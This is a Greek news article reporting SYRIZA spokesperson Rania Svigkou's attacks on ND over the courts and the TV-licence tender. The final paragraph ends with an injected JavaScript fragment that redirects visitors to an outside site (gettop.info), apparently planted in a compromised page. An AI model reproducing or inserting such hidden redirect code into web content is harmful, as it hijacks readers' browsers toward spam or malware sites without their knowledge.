Ρ. Σβίγκου: Δεν δίνει δεκάρα τσακιστή η ΝΔ για τη νομιμότητα και τη διαφάνεια

0
12
Φωτογραφία που δόθηκε σήμερα στη δημοσιότητα και εικονίζει την εκπρόσωπο Τύπου του ΣΥΡΙΖΑ, Ράνια Σβίγκου. Πέμπτη 26 Νοεμβρίου 2015. ΑΠΕ-ΜΠΕ/ΓΡΑΦΕΙΟ ΤΥΠΟΥ ΣΥΡΙΖΑ/Άγγελος Καλοδούκας

 

«Δεν δίνει δεκάρα τσακιστή η ΝΔ για τη νομιμότητα και τη διαφάνεια. Το μόνο που την ενδιαφέρει είναι η συνέχιση της διαπλοκής», τόνισε η εκπρόσωπος Τύπου του ΣΥΡΙΖΑ.

H Ράνια Σβίγκου, σε συνέντευξή της στον ΣΚΑΪ, κάλεσε το κόμμα της αξιωματικής αντιπολίτευσης «να αφήσουν τη Δικαιοσύνη ανενόχλητη να συνεχίσει το έργο της και να μην κάνουν παιχνίδια, ούτε με τη Δικαιοσύνη ούτε με τη Δημοκρατία».

Αποκρούοντας τις κατηγορίες της αντιπολίτευσης για προσπάθεια παρέμβασης της κυβέρνησης στη Δικαιοσύνη και για «συναλλαγή», η κ. Σβίγκου επισήμανε ότι η χθεσινή συνάντηση του πρωθυπουργού με τους ανώτατους δικαστικούς λειτουργούς, ήταν ανάλογη με αυτήν που είχε κάνει και ο κ. Σαμαράς το 2012, ότι δεν αφορούσε συνδικαλιστικά θέματα, αλλά αποφάσεις δικαστηρίων, οπότε αυτή ήταν η αρμόζουσα σύνθεση για να συζητηθεί το θέμα.

Τόνισε ότι σε καμία περίπτωση δεν είναι κλειστές οι πόρτες του Μαξίμου και των αρμόδιων υπουργών για να συζητηθούν τα προβλήματα όλων, στο μέτρο που θίγονται από την κρίση και πως ανεξαρτήτως κλάδου η κυβέρνηση προσπαθεί να συζητά με τους αρμόδιους κάθε τομέα.

«Η ΝΔ δεν χάνει ευκαιρία, ώστε αφ’ ενός να επιτεθεί στον ΣΥΡΙΖΑ και αφ? ετέρου να επιτεθεί στη Δικαιοσύνη, θεωρώντας ότι μ’ αυτόν τον τρόπο η Δικαιοσύνη θα επηρεαστεί, εν όψει και του διαγωνισμού για τις τηλεοπτικές άδειες ή ότι ενδεχομένως κάποιοι δημόσιοι λειτουργοί θα τρομοκρατηθούν», υπογράμμισε. Υποστήριξε δε, ότι πέφτουν στο κενό και αυτές οι προσπάθειες να αναδειχτεί η οποιαδήποτε «συνδιαλλαγή».

Η κ. Σβίγκου στηλίτευσε τη στάση «υποδείξεων» και «ευθέων παρεμβάσεων» της ΝΔ προς τη Δικαιοσύνη, τονίζοντας ότι «επιχειρείται να δημιουργηθούν αυτή τη στιγμή, σκιές στη λειτουργία της Δικαιοσύνης, εν όψει και της απόφασης του ΣτΕ κι αυτό είναι κάτι το οποίο θα πρέπει να τελειώσει».

«Καλό θα είναι», είπε, «η ΝΔ, η οποία επιφυλάσσει για τον εαυτό της, μία το ρόλο του καναλάρχη, μία το ρόλο του συνηγόρου των καναλαρχών στο ΣτΕ, να ηρεμήσει και να περιμένει και η ίδια την απόφαση του ΣτΕ και να αποφασίσει αν τελικά υπάρχει συνέχεια του κράτους και θα αναγνωρίσει το νόμο ή αν τελικά θα τον καταργήσει».

Επίσης, κάλεσε τη ΝΔ να εξηγήσει τον λόγο για τον οποίο θέλει, όπως είπε, τα χρήματα από το τίμημα για τις τηλεοπτικές άδειες, αντί να περάσουν στους Έλληνες πολίτες, να περάσουν στους καναλάρχες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here